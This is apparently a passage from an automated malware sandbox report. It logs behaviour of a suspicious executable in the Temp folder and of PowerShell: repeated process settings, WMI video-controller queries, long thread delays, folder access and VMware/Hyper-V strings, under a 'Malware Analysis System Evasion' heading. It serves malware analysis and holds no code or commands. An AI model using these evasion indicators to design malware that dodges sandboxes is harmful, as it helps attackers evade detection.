            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 1090000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 4A30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 50B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 60B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 61E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 71E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 14C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: 15E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4329Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1826Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWindow / User API: threadDelayed 359Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWindow / User API: threadDelayed 9479Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 7724Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 7432Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 2304Thread sleep time: -29514790517935264s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000002.1328666970.0000000000C22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
            Source: powershell.exe, 00000008.00000002.1350376633.000002582709F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: powershell.exe, 00000008.00000002.1350376633.000002582709F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\q
